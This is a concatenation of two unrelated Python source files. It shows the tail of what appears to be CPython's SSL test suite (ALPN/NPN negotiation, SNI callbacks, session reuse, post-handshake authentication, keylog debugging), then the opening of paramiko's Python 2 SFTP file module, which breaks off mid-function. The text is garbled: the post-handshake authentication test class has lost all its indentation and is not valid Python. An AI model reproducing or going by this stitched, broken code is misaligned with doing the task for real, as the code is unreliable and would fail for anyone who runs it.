    server_protocols = ['foo', 'bar', 'milkshake']
    protocol_tests = [
        # (client offer, expected negotiated protocol)
        (['foo', 'bar'], 'foo'),
        (['bar', 'foo'], 'foo'),
        (['milkshake'], 'milkshake'),
        (['http/3.0', 'http/4.0'], None)
    ]
    for client_protocols, expected in protocol_tests:
        client_context, server_context, hostname = testing_context()
        server_context.set_alpn_protocols(server_protocols)
        client_context.set_alpn_protocols(client_protocols)

        try:
            stats = server_params_test(client_context,
                                       server_context,
                                       chatty=True,
                                       connectionchatty=True,
                                       sni_name=hostname)
        except ssl.SSLError as e:
            # Some OpenSSL versions fail the handshake on no-overlap;
            # keep the exception so the branch below can assert on it.
            stats = e

        if (expected is None and IS_OPENSSL_1_1_0
                and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
            # OpenSSL 1.1.0 to 1.1.0e raises handshake error
            self.assertIsInstance(stats, ssl.SSLError)
        else:
            # %% survives the first interpolation so the final message
            # can be filled in with the actual result and the side name.
            msg = "failed trying %s (s) and %s (c).\n" \
                  "was expecting %s, but got %%s from the %%s" \
                      % (str(server_protocols), str(client_protocols),
                         str(expected))
            client_result = stats['client_alpn_protocol']
            self.assertEqual(client_result, expected,
                             msg % (client_result, "client"))
            server_result = stats['server_alpn_protocols'][-1] \
                if len(stats['server_alpn_protocols']) else 'nothing'
            self.assertEqual(server_result, expected,
                             msg % (server_result, "server"))
def test_selected_npn_protocol(self):
    """Without NPN configured, selected_npn_protocol() is None."""
    client_context, server_context, hostname = testing_context()
    handshake = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
    self.assertIs(handshake['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
    """NPN negotiation across several client offers."""
    server_protocols = ['http/1.1', 'spdy/2']
    protocol_tests = [
        # (client offer, expected negotiated protocol)
        (['http/1.1', 'spdy/2'], 'http/1.1'),
        (['spdy/2', 'http/1.1'], 'http/1.1'),
        (['spdy/2', 'test'], 'spdy/2'),
        (['abc', 'def'], 'abc')
    ]
    for client_protocols, expected in protocol_tests:
        client_context, server_context, hostname = testing_context()
        server_context.set_npn_protocols(server_protocols)
        client_context.set_npn_protocols(client_protocols)
        stats = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
        # %% survives the first interpolation so the final message can
        # be filled in with the actual result and the side name.
        msg = "failed trying %s (s) and %s (c).\n" \
              "was expecting %s, but got %%s from the %%s" \
                  % (str(server_protocols), str(client_protocols),
                     str(expected))
        client_result = stats['client_npn_protocol']
        self.assertEqual(client_result, expected, msg % (client_result, "client"))
        server_result = stats['server_npn_protocols'][-1] \
            if len(stats['server_npn_protocols']) else 'nothing'
        self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
    """Return (server_ctx, alternate_server_ctx, client_ctx) for SNI tests."""
    def _server_ctx(certfile):
        # Each server context serves a different signed certificate.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(certfile)
        return ctx

    client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    client_ctx.load_verify_locations(SIGNING_CA)
    return _server_ctx(SIGNED_CERTFILE), _server_ctx(SIGNED_CERTFILE2), client_ctx
def check_common_name(self, stats, name):
    """Assert that the peer certificate in *stats* carries commonName *name*."""
    subject = stats['peercert']['subject']
    self.assertIn((('commonName', name),), subject)
@needs_sni
def test_sni_callback(self):
    """set_servername_callback(): invocation, context switch, disabling."""
    calls = []
    server_context, other_context, client_context = self.sni_contexts()
    client_context.check_hostname = False

    def servername_cb(ssl_sock, server_name, initial_context):
        # Record every invocation; switch to the alternate context
        # whenever a server name was actually sent.
        calls.append((server_name, initial_context))
        if server_name is not None:
            ssl_sock.context = other_context
    server_context.set_servername_callback(servername_cb)

    stats = server_params_test(client_context, server_context,
                               chatty=True,
                               sni_name='supermessage')
    # The hostname was fetched properly, and the certificate was
    # changed for the connection.
    self.assertEqual(calls, [("supermessage", server_context)])
    # CERTFILE4 was selected
    self.check_common_name(stats, 'fakehostname')

    calls = []
    # The callback is called with server_name=None
    stats = server_params_test(client_context, server_context,
                               chatty=True,
                               sni_name=None)
    self.assertEqual(calls, [(None, server_context)])
    self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)

    # Check disabling the callback
    calls = []
    server_context.set_servername_callback(None)
    stats = server_params_test(client_context, server_context,
                               chatty=True,
                               sni_name='notfunny')
    # Certificate didn't change
    self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
    self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
    """An alert code returned by the SNI callback reaches the client."""
    server_context, other_context, client_context = self.sni_contexts()

    def deny_access(ssl_sock, server_name, initial_context):
        return ssl.ALERT_DESCRIPTION_ACCESS_DENIED

    server_context.set_servername_callback(deny_access)
    with self.assertRaises(ssl.SSLError) as cm:
        server_params_test(client_context, server_context,
                           chatty=False,
                           sni_name='supermessage')
    self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
    """Raising in the SNI callback fails the handshake with an alert."""
    # Raising fails the connection with a TLS handshake failure alert.
    server_context, other_context, client_context = self.sni_contexts()

    def cb_raising(ssl_sock, server_name, initial_context):
        # Deliberate error inside the callback.
        1/0
    server_context.set_servername_callback(cb_raising)

    # The callback's exception cannot propagate through OpenSSL, so it
    # surfaces as an "unraisable" exception on the server side.
    with support.catch_unraisable_exception() as catch:
        with self.assertRaises(ssl.SSLError) as cm:
            stats = server_params_test(client_context, server_context,
                                       chatty=False,
                                       sni_name='supermessage')

        self.assertEqual(cm.exception.reason,
                         'SSLV3_ALERT_HANDSHAKE_FAILURE')
        self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
    """A non-int return from the SNI callback yields an internal error."""
    # Returning the wrong return type terminates the TLS connection
    # with an internal error alert.
    server_context, other_context, client_context = self.sni_contexts()

    def cb_wrong_return_type(ssl_sock, server_name, initial_context):
        return "foo"
    server_context.set_servername_callback(cb_wrong_return_type)

    # The TypeError cannot propagate through OpenSSL, so it surfaces
    # as an "unraisable" exception on the server side.
    with support.catch_unraisable_exception() as catch:
        with self.assertRaises(ssl.SSLError) as cm:
            stats = server_params_test(client_context, server_context,
                                       chatty=False,
                                       sni_name='supermessage')

        self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
        self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
    """shared_ciphers() only lists suites usable by both peers."""
    client_context, server_context, hostname = testing_context()
    client_context.set_ciphers("AES128:AES256")
    server_context.set_ciphers("AES256")
    # TLS 1.3 ciphers are always enabled, so accept those families
    # alongside the AES256 suites the server restricts itself to.
    allowed_fragments = (
        "AES256", "AES-256",
        "TLS_CHACHA20", "TLS_AES",
    )
    stats = server_params_test(client_context, server_context,
                               sni_name=hostname)
    shared = stats['server_shared_ciphers'][0]
    self.assertGreater(len(shared), 0)
    for suite_name, _tls_version, _bits in shared:
        if not any(fragment in suite_name for fragment in allowed_fragments):
            self.fail(suite_name)
def test_read_write_after_close_raises_valuerror(self):
    """read()/write() on a closed SSLSocket raise ValueError."""
    client_context, server_context, hostname = testing_context()
    server = ThreadedEchoServer(context=server_context, chatty=False)
    with server:
        conn = client_context.wrap_socket(socket.socket(),
                                          server_hostname=hostname)
        conn.connect((HOST, server.port))
        conn.close()
        self.assertRaises(ValueError, conn.read, 1024)
        self.assertRaises(ValueError, conn.write, b'hello')
def test_sendfile(self):
    """sendfile() transmits a file's contents over a TLS connection."""
    payload = b"x" * 512
    with open(support.TESTFN, 'wb') as out:
        out.write(payload)
    self.addCleanup(support.unlink, support.TESTFN)

    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.load_verify_locations(SIGNING_CA)
    ctx.load_cert_chain(SIGNED_CERTFILE)

    with ThreadedEchoServer(context=ctx, chatty=False) as server:
        with ctx.wrap_socket(socket.socket()) as conn:
            conn.connect((HOST, server.port))
            with open(support.TESTFN, 'rb') as src:
                conn.sendfile(src)
            # The echo server sends the file contents straight back.
            self.assertEqual(conn.recv(1024), payload)
def test_session(self):
    """SSLSession objects can be inspected and reused across connections."""
    client_context, server_context, hostname = testing_context()
    # TODO: sessions aren't compatible with TLSv1.3 yet
    client_context.options |= ssl.OP_NO_TLSv1_3

    # first connection without session
    stats = server_params_test(client_context, server_context,
                               sni_name=hostname)
    session = stats['session']
    self.assertTrue(session.id)
    self.assertGreater(session.time, 0)
    self.assertGreater(session.timeout, 0)
    self.assertTrue(session.has_ticket)
    if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
        self.assertGreater(session.ticket_lifetime_hint, 0)
    self.assertFalse(stats['session_reused'])
    sess_stat = server_context.session_stats()
    self.assertEqual(sess_stat['accept'], 1)
    self.assertEqual(sess_stat['hits'], 0)

    # reuse session — second accept must register as a cache hit
    stats = server_params_test(client_context, server_context,
                               session=session, sni_name=hostname)
    sess_stat = server_context.session_stats()
    self.assertEqual(sess_stat['accept'], 2)
    self.assertEqual(sess_stat['hits'], 1)
    self.assertTrue(stats['session_reused'])
    session2 = stats['session']
    # Equal session, same id, but a distinct Python object.
    self.assertEqual(session2.id, session.id)
    self.assertEqual(session2, session)
    self.assertIsNot(session2, session)
    self.assertGreaterEqual(session2.time, session.time)
    self.assertGreaterEqual(session2.timeout, session.timeout)

    # another one without session — a brand-new session, no extra hit
    stats = server_params_test(client_context, server_context,
                               sni_name=hostname)
    self.assertFalse(stats['session_reused'])
    session3 = stats['session']
    self.assertNotEqual(session3.id, session.id)
    self.assertNotEqual(session3, session)
    sess_stat = server_context.session_stats()
    self.assertEqual(sess_stat['accept'], 3)
    self.assertEqual(sess_stat['hits'], 1)

    # reuse session again
    stats = server_params_test(client_context, server_context,
                               session=session, sni_name=hostname)
    self.assertTrue(stats['session_reused'])
    session4 = stats['session']
    self.assertEqual(session4.id, session.id)
    self.assertEqual(session4, session)
    self.assertGreaterEqual(session4.time, session.time)
    self.assertGreaterEqual(session4.timeout, session.timeout)
    sess_stat = server_context.session_stats()
    self.assertEqual(sess_stat['accept'], 4)
    self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
    """Setting SSLSocket.session: type/timing checks and context affinity."""
    client_context, server_context, hostname = testing_context()
    client_context2, _, _ = testing_context()
    # TODO: session reuse does not work with TLSv1.3
    client_context.options |= ssl.OP_NO_TLSv1_3
    client_context2.options |= ssl.OP_NO_TLSv1_3

    server = ThreadedEchoServer(context=server_context, chatty=False)
    with server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            # session is None before handshake
            self.assertEqual(s.session, None)
            self.assertEqual(s.session_reused, None)
            s.connect((HOST, server.port))
            session = s.session
            self.assertTrue(session)
            # only SSLSession instances are accepted
            with self.assertRaises(TypeError) as e:
                s.session = object
            self.assertEqual(str(e.exception), 'Value is not a SSLSession.')

        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            s.connect((HOST, server.port))
            # cannot set session after handshake
            with self.assertRaises(ValueError) as e:
                s.session = session
            self.assertEqual(str(e.exception),
                             'Cannot set session after handshake.')

        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            # can set session before handshake and before the
            # connection was established
            s.session = session
            s.connect((HOST, server.port))
            self.assertEqual(s.session.id, session.id)
            self.assertEqual(s.session, session)
            self.assertEqual(s.session_reused, True)

        with client_context2.wrap_socket(socket.socket(),
                                        server_hostname=hostname) as s:
            # cannot re-use session with a different SSLContext
            with self.assertRaises(ValueError) as e:
                s.session = session
                s.connect((HOST, server.port))
            self.assertEqual(str(e.exception),
                             'Session refers to a different SSLContext.')
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with support.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
    """post_handshake_auth must not implicitly enable cert validation (bpo-37428)."""
    hostname = SIGNED_CERTFILE_HOSTNAME

    # Client: PHA enabled, but no cert validation and no CA loaded.
    client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    client_context.post_handshake_auth = True
    client_context.load_cert_chain(SIGNED_CERTFILE)
    client_context.check_hostname = False
    client_context.verify_mode = ssl.CERT_NONE

    # Server: demands a client cert via post-handshake auth.
    server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    server_context.load_cert_chain(SIGNED_CERTFILE)
    server_context.load_verify_locations(SIGNING_CA)
    server_context.post_handshake_auth = True
    server_context.verify_mode = ssl.CERT_REQUIRED

    server = ThreadedEchoServer(context=server_context, chatty=False)
    with server, client_context.wrap_socket(
            socket.socket(), server_hostname=hostname) as sock:
        sock.connect((HOST, server.port))
        # No client cert before PHA, one after.
        sock.write(b'HASCERT')
        self.assertEqual(sock.recv(1024), b'FALSE\n')
        sock.write(b'PHA')
        self.assertEqual(sock.recv(1024), b'OK\n')
        sock.write(b'HASCERT')
        self.assertEqual(sock.recv(1024), b'TRUE\n')
        # The server cert was never validated on the client side.
        self.assertEqual(sock.getpeercert(), {})
# True when the linked OpenSSL (1.1.1+) exposes the keylog callback API.
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
# Decorator: skip keylog tests when the callback API is unavailable.
requires_keylog = unittest.skipUnless(
    HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
    """Tests for debugging aids: SSLKEYLOGFILE support and the message callback."""

    def keylog_lines(self, fname=support.TESTFN):
        # Count the lines currently written to the keylog file.
        with open(fname) as f:
            return len(list(f))

    @requires_keylog
    @unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
    def test_keylog_defaults(self):
        self.addCleanup(support.unlink, support.TESTFN)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        self.assertEqual(ctx.keylog_filename, None)

        self.assertFalse(os.path.isfile(support.TESTFN))
        # Assigning a filename creates the file and writes one header line.
        ctx.keylog_filename = support.TESTFN
        self.assertEqual(ctx.keylog_filename, support.TESTFN)
        self.assertTrue(os.path.isfile(support.TESTFN))
        self.assertEqual(self.keylog_lines(), 1)

        ctx.keylog_filename = None
        self.assertEqual(ctx.keylog_filename, None)

        with self.assertRaises((IsADirectoryError, PermissionError)):
            # Windows raises PermissionError
            ctx.keylog_filename = os.path.dirname(
                os.path.abspath(support.TESTFN))

        with self.assertRaises(TypeError):
            ctx.keylog_filename = 1

    @requires_keylog
    @unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
    def test_keylog_filename(self):
        self.addCleanup(support.unlink, support.TESTFN)
        client_context, server_context, hostname = testing_context()

        # Client-side logging only.
        client_context.keylog_filename = support.TESTFN
        server = ThreadedEchoServer(context=server_context, chatty=False)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
        # header, 5 lines for TLS 1.3
        self.assertEqual(self.keylog_lines(), 6)

        # Server-side logging appends to the same file.
        client_context.keylog_filename = None
        server_context.keylog_filename = support.TESTFN
        server = ThreadedEchoServer(context=server_context, chatty=False)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
        self.assertGreaterEqual(self.keylog_lines(), 11)

        # Both sides logging to the same file.
        client_context.keylog_filename = support.TESTFN
        server_context.keylog_filename = support.TESTFN
        server = ThreadedEchoServer(context=server_context, chatty=False)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
        self.assertGreaterEqual(self.keylog_lines(), 21)

        client_context.keylog_filename = None
        server_context.keylog_filename = None

    @requires_keylog
    @unittest.skipIf(sys.flags.ignore_environment,
                     "test is not compatible with ignore_environment")
    @unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
    def test_keylog_env(self):
        # SSLKEYLOGFILE is honored by the default-context factories, but not
        # by a bare SSLContext constructor.
        self.addCleanup(support.unlink, support.TESTFN)
        with unittest.mock.patch.dict(os.environ):
            os.environ['SSLKEYLOGFILE'] = support.TESTFN
            self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)

            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            self.assertEqual(ctx.keylog_filename, None)

            ctx = ssl.create_default_context()
            self.assertEqual(ctx.keylog_filename, support.TESTFN)

            ctx = ssl._create_stdlib_context()
            self.assertEqual(ctx.keylog_filename, support.TESTFN)

    def test_msg_callback(self):
        # _msg_callback accepts a callable or None; anything else is rejected.
        client_context, server_context, hostname = testing_context()

        def msg_cb(conn, direction, version, content_type, msg_type, data):
            pass

        self.assertIs(client_context._msg_callback, None)
        client_context._msg_callback = msg_cb
        self.assertIs(client_context._msg_callback, msg_cb)

        with self.assertRaises(TypeError):
            client_context._msg_callback = object()

    def test_msg_callback_tls12(self):
        # Force TLS 1.2 and verify the callback observes handshake messages
        # specific to that protocol version.
        client_context, server_context, hostname = testing_context()
        client_context.options |= ssl.OP_NO_TLSv1_3

        msg = []

        def msg_cb(conn, direction, version, content_type, msg_type, data):
            self.assertIsInstance(conn, ssl.SSLSocket)
            self.assertIsInstance(data, bytes)
            self.assertIn(direction, {'read', 'write'})
            msg.append((direction, version, content_type, msg_type))

        client_context._msg_callback = msg_cb

        server = ThreadedEchoServer(context=server_context, chatty=False)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))

        self.assertIn(
            ("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
             _TLSMessageType.SERVER_KEY_EXCHANGE),
            msg
        )
        self.assertIn(
            ("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
             _TLSMessageType.CHANGE_CIPHER_SPEC),
            msg
        )
def test_main(verbose=False):
    """Collect and run every test class; print build details when verbose."""
    if support.verbose:
        # Identify the host platform for the log header.
        plats = {
            'Mac': platform.mac_ver,
            'Windows': platform.win32_ver,
        }
        for name, func in plats.items():
            plat = func()
            if plat and plat[0]:
                plat = '%s %r' % (name, plat)
                break
        else:
            plat = repr(platform.platform())
        print("test_ssl: testing with %r %r" %
              (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
        print(" under %s" % plat)
        print(" HAS_SNI = %r" % ssl.HAS_SNI)
        print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
        try:
            print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
        except AttributeError:
            pass

    # Fail fast if any certificate fixture is missing on disk.
    for filename in [
        CERTFILE, BYTES_CERTFILE,
        ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
        SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
        BADCERT, BADKEY, EMPTYCERT]:
        if not os.path.exists(filename):
            raise support.TestFailed("Can't read certificate file %r" % filename)

    tests = [
        ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
        SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
        TestPostHandshakeAuth, TestSSLDebug
    ]

    # Networked tests only run when the 'network' resource is enabled.
    if support.is_resource_enabled('network'):
        tests.append(NetworkedTests)

    thread_info = support.threading_setup()
    try:
        support.run_unittest(*tests)
    finally:
        # Ensure no stray server threads survive the test run.
        support.threading_cleanup(*thread_info)


if __name__ == "__main__":
    test_main()
|
sftp_file.py | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
L{SFTPFile}
"""
from binascii import hexlify
from collections import deque
import socket
import threading
import time
from paramiko.common import *
from paramiko.sftp import *
from paramiko.file import BufferedFile
from paramiko.sftp_attr import SFTPAttributes
class SFTPFile (BufferedFile):
    """
    Proxy object for a file on the remote server, in client mode SFTP.

    Instances of this class may be used as context managers in the same way
    that built-in Python file objects are.
    """
    # NOTE(review): this module is Python 2 code (``async`` used as an
    # identifier, ``except Exception, x``, ``long``, cmp-style sort) and
    # will not parse under Python 3.

    # Some sftp servers will choke if you send read/write requests larger than
    # this size.
    MAX_REQUEST_SIZE = 32768

    def __init__(self, sftp, handle, mode='r', bufsize=-1):
        BufferedFile.__init__(self)
        self.sftp = sftp        # parent SFTP client, used for all requests
        self.handle = handle    # opaque server-side file handle
        BufferedFile._set_mode(self, mode, bufsize)
        self.pipelined = False
        # Prefetch state: buffered data keyed by file offset, plus the list
        # of outstanding (offset, length) read requests still in flight.
        self._prefetching = False
        self._prefetch_done = False
        self._prefetch_data = {}
        self._prefetch_reads = []
        # An exception raised by an async response is stashed here and
        # re-raised on the next file operation (see _check_exception).
        self._saved_exception = None
        self._reqs = deque()

    def __del__(self):
        # Don't block during GC: close without waiting for a server response.
        self._close(async=True)

    def close(self):
        self._close(async=False)

    def _close(self, async=False):
        # We allow double-close without signaling an error, because real
        # Python file objects do. However, we must protect against actually
        # sending multiple CMD_CLOSE packets, because after we close our
        # handle, the same handle may be re-allocated by the server, and we
        # may end up mysteriously closing some random other file. (This is
        # especially important because we unconditionally call close() from
        # __del__.)
        if self._closed:
            return
        self.sftp._log(DEBUG, 'close(%s)' % hexlify(self.handle))
        if self.pipelined:
            # Drain any outstanding pipelined write responses first.
            self.sftp._finish_responses(self)
        BufferedFile.close(self)
        try:
            if async:
                # GC'd file handle could be called from an arbitrary thread -- don't wait for a response
                self.sftp._async_request(type(None), CMD_CLOSE, self.handle)
            else:
                self.sftp._request(CMD_CLOSE, self.handle)
        except EOFError:
            # may have outlived the Transport connection
            pass
        except (IOError, socket.error):
            # may have outlived the Transport connection
            pass

    def _data_in_prefetch_requests(self, offset, size):
        # Return True if the byte range [offset, offset + size) is fully
        # covered by prefetch read requests already in flight.
        k = [i for i in self._prefetch_reads if i[0] <= offset]
        if len(k) == 0:
            return False
        # Find the in-flight request starting closest to (at or before) offset.
        k.sort(lambda x, y: cmp(x[0], y[0]))
        buf_offset, buf_size = k[-1]
        if buf_offset + buf_size <= offset:
            # prefetch request ends before this one begins
            return False
        if buf_offset + buf_size >= offset + size:
            # inclusive
            return True
        # well, we have part of the request. see if another chunk has the rest.
        return self._data_in_prefetch_requests(buf_offset + buf_size, offset + size - buf_offset - buf_size)

    def _data_in_prefetch_buffers(self, offset):
        """
        if a block of data is present in the prefetch buffers, at the given
        offset, return the offset of the relevant prefetch buffer. otherwise,
        return None. this guarantees nothing about the number of bytes
        collected in the prefetch buffer so far.
        """
        k = [i for i in self._prefetch_data.keys() if i <= offset]
        if len(k) == 0:
            return None
        index = max(k)
        buf_offset = offset - index
        if buf_offset >= len(self._prefetch_data[index]):
            # it's not here
            return None
        return index

    def _read_prefetch(self, size):
        """
        read data out of the prefetch buffer, if possible. if the data isn't
        in the buffer, return None. otherwise, behaves like a normal read.
        """
        # while not closed, and haven't fetched past the current position, and haven't reached EOF...
        while True:
            offset = self._data_in_prefetch_buffers(self._realpos)
            if offset is not None:
                break
            if self._prefetch_done or self._closed:
                break
            # Block until another async read response arrives.
            self.sftp._read_response()
            self._check_exception()
        if offset is None:
            self._prefetching = False
            return None
        prefetch = self._prefetch_data[offset]
        del self._prefetch_data[offset]

        # Trim any bytes before the current position, re-buffering the head.
        buf_offset = self._realpos - offset
        if buf_offset > 0:
            self._prefetch_data[offset] = prefetch[:buf_offset]
            prefetch = prefetch[buf_offset:]
        # Re-buffer any bytes beyond the requested size.
        if size < len(prefetch):
